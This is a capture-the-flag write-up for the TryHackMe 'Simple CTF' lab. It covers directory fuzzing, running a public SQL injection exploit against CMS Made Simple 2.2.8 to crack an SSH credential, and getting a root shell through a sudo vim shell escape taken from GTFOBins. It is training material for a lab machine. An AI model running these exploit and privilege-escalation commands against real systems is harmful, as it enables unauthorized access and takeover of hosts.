TryHackMe - Simple CTF (Easy)
FFUF finds a
/simple directory on port 80 which hosts CMS Made Simple 2.2.8. This service has an unauthenticated SQL injection exploit. The exploit finds a SSH credential for us and we can SSH in to get a user shell.In the privilege escalation phase, we find we are able to run Vim as root from
sudo -l. Use a payload from GTFOBins to get a root shell.- RHOST: 10.10.74.168
- LHOST: 10.13.12.2
Nmap
Run FFUF:
ffuf -u http://10.10.74.168/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .php,.html,.txt -fc 400,401,403
FFUF finds
/robots.txt and /simple:
FFUF
Version number is leaked on
/simple:
CMS Made Simple version 2.2.8
Searchsploit:
Searchsploit
Install termcolor:
python2 -m pip install termcolor
Run the exploit:
$ ./sqli.py -u http://10.10.74.168/simple --crack -w /usr/share/wordlists/rockyou.txt
The exploit finds a credential
mitch:secret:
Credential
SSH login as mitch:
ssh [email protected] -p 2222
Now we have a user shell:
User shell
sudo -l:
sudo -l
Use the payload from GTFOBins:
$ sudo vim -c ':!/bin/sh'
Now we have a root shell:
root shell